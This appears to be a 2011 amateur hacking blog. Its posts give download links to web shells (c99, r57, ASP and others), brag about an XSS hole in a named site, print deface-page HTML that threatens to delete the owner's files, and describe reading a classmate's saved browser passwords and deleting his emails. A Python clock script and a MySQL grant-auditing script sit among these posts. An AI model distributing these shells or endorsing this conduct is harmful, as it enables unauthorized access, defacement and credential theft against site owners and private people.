Sunday, November 27, 2011

Here are some shells

Lately I've seen a lot of people that had a hard time finding c99 shells, r57 shells, etc., so I thought I would release a bunch so you guys don't have to look any further than Hackoria :D

c99: http://r57.gen.tr/c99.rar

r57: http://r57.gen.tr/r57.rar

c100: http://r57.gen.tr/c100.rar

ASP Shell: http://r57.gen.tr/cmd.rar

AJAX shell: http://r57.gen.tr/ajax.rar

MySQL Shell: http://r57.gen.tr/mysql.rar

Simple Python Clock

Well, I was bored and was playing around with some Python and decided to make a simple clock. Here is the code:


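import time as t

# Ask for the starting time once; the loop below keeps it up to date.
hour = int(input("What is the current hour? "))
minute = int(input("And how many minutes into the hour are we? "))

while True:
    # Print the time, padding single-digit minutes with a leading zero.
    if minute < 10:
        print("%s:0%s" % (hour, minute))
    else:
        print("%s:%s" % (hour, minute))
    t.sleep(60)
    minute = minute + 1
    if minute == 60:
        minute = 0  # reset the minutes (the original compared with == here)
        hour = hour + 1
        if hour == 13:
            hour = 1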

Sunday, November 13, 2011

Hacking Large Companies

We see all these stories on the news of hacker teams going around hacking, and sometimes ruining, these large companies. So then we have to ask ourselves, how do people go about hacking such "secure" systems?

Well, first we have to understand that things like this don't happen overnight. It takes planning, sometimes months of planning.

First what they do is find out what the server is running. This can usually be done with a simple Nmap scan.

Next, the hackers create their own environment that is an exact replica of the server they are planning to attack.

They then search for exploits, which takes quite some work. Now, I'm not talking about public exploits that you find on the exploit-db; I'm talking about private exploits that are created by the hackers.

Once this is complete they initiate the attack and all hell breaks loose.

This post was really because I've been getting a lot of questions lately about how this happens, so I just thought I would post the process. This is also the VERY basics of what happens behind the scenes, just so you get a general idea.

Steam was hacked... but how did it happen?

As you all probably know, Steam was hacked. Well, the forums were, which allowed the hackers to access the Steam database and retrieve all types of sensitive information.

So how did they do it? Let's break it down.

Steam runs an old version of vBulletin, 3.8.7 I believe it is? Anyway, vBulletin has always been prone to vulnerabilities such as RFI and SQLi, so Steam made a poor decision by choosing to use this forum software. Hackers then took advantage of this vulnerability and got all the information they needed.

This could have easily been avoided for two reasons: one, if they hadn't used the same MySQL server as they do for the actual Steam accounts, the hackers could not have had access to the information, and two, Steam should not have been using vBulletin when better forum software like MyBB is out there.


If you have made any purchases on Steam I suggest you check your credit card more often to make sure there aren't any weird purchases on there.
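The separation point in this post can be checked by reviewing what the forum's database account is allowed to reach. The following is an added example, not code from the original post: it parses lines in the format MySQL's SHOW GRANTS prints and reports every privilege that reaches outside the forum's own schema. The account name forum_app and the schema names vbforum and accounts are hypothetical, and the sample grants are constructed.

```python
import re

# One line of SHOW GRANTS output, e.g.
#   GRANT SELECT, INSERT ON `vbforum`.* TO 'forum_app'@'10.0.0.5'
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?:(?:TABLE|FUNCTION|PROCEDURE)\s+)?"
    r"(?P<scope>\S+)\s+TO\s+(?P<user>\S+@\S+)",
    re.IGNORECASE,
)

# Constructed sample: what SHOW GRANTS might print for a hypothetical forum
# account that was also given read access to a separate accounts schema.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'forum_app'@'10.0.0.5'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `vbforum`.* TO 'forum_app'@'10.0.0.5'",
    "GRANT SELECT ON `accounts`.`users` TO 'forum_app'@'10.0.0.5'",
]


def audit_grants(grant_lines, allowed_schema):
    """Return (user, schema, privileges) for every grant outside allowed_schema."""
    findings = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        if m.group("privs").strip().upper() == "USAGE":
            continue  # USAGE grants no privileges; it only records the account
        # Split on commas, but not on commas inside a column list "(a, b)".
        privs = [p.strip() for p in re.split(r",\s*(?![^()]*\))", m.group("privs"))]
        schema = m.group("scope").partition(".")[0].strip("`")
        if schema == "*":
            # Server-wide grant: the account can reach every schema.
            findings.append((m.group("user"), "global", privs))
        elif schema != allowed_schema:
            findings.append((m.group("user"), schema, privs))
    return findings


if __name__ == "__main__":
    for user, schema, privs in audit_grants(SAMPLE_GRANTS, "vbforum"):
        print("%s reaches %s: %s" % (user, schema, ", ".join(privs)))
```

Schema names are compared literally, so a grant on a wildcard pattern such as `%` is reported rather than trusted.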

Thursday, November 3, 2011

Nice python scripts

Hey, sorry I haven't posted in like a month ahaha, I haven't had time.

Lately I've gotten back into Python and I've been doing some work on a few scripts that may become useful to you.

I will try to release a new one as frequently as possible, so be sure to look out for those!

Sunday, October 9, 2011

rustywalrus.com XSS Vulnerability

So I was searching around Google and I came across this shit site called rustywalrus.com, so I thought "Hey, what the heck, let's see what I can do." It turns out the site is vulnerable to XSS; however, it's non-persistent and I did not find a place to upload a cookie catcher, so all I can do is display messages to myself :/ Hey, it's still a hack! Here are some pics:

See? It's vulnerable!

Here is my temp deface! Oh YeA!
Lol, like my deface page? It took me 5 minutes to make! Here's the code:




<html>
    <head><title>You Were Hacked</title></head>
<body bgcolor=black background="http://t3.gstatic.com/images?q=tbn:ANd9GcSGdXMiA99OcxPAfbaCHI7Ud5DXdZEXpoyHx81qE8MzziwRVnSLDg">

<center>
<br/><br/><br/><br/><br/>
<script language="Javascript"><!--
// Lines of text that get "typed" into the textarea one character at a time.
var tl=new Array(
"Connecting...",
"Injecting code...",
"",
"security == 0;",
"",
"if(security == 0){",
"    echo 'Admin You Fail!';",
"}",
"",
"Admin You Fail!",
"",
"You were hacked by Max00355",
"You made it way too easy...",
"Please learn to code!" ,
"I am not a criminal... if anything I helped you... you should thank me!",
"I will be keeping an eye on you to make sure you improve your security... if you don't all your files will be deleted...",
"Check out my blog http://hackoria.blogspot.com"
);
var speed=30;            // delay between characters, in milliseconds
var index=0, text_pos=0; // current line in tl and position within that line
var str_length=tl[0].length;
var contents, row;

function type_text()
{
    // Show at most the previous 9 finished lines above the one being typed.
    contents='';
    row=Math.max(0,index-9);
    while(row<index)
        contents += tl[row++] + '\r\n';
    document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + "_";
    if(text_pos++==str_length)
    {
        // Line finished: move on to the next one after a longer pause.
        text_pos=0;
        index++;
        if(index!=tl.length)
        {
            str_length=tl[index].length;
            setTimeout(type_text,800);
        }
    } else
        setTimeout(type_text,speed);
}
//--></script>

<form><textarea background="red" rows=10 cols=60 wrap=soft></textarea></form>

<script language="Javascript">type_text();</script>
</center>
</body>
</html>

Friday, October 7, 2011

Wow kids are stupid...

In my school you are allowed to bring in your laptops for work and whatnot. There is this one kid who is so annoying about his Mac, bragging about it, telling people how he bought it with his money, whatever. Well, today I asked if I could use his computer to check my grades (at this point I had no intentions of doing anything evil). When I was just about to finish what I was doing it came to me: "This kid's using Firefox, which means I can see his passwords easily!" When I saw his passwords I kinda giggled to myself; his password was "Pokemon" with a capital P! There isn't really much I can do with this, I mean I don't really wanna ruin his Facebook or anything, so all I really did was delete his school emails so he can't do his homework! Haha, and yes, his password is the same for everything. This isn't really hacking as much as it is thinking quickly, but I thought it would be a fun share.

What do you think I should do with it?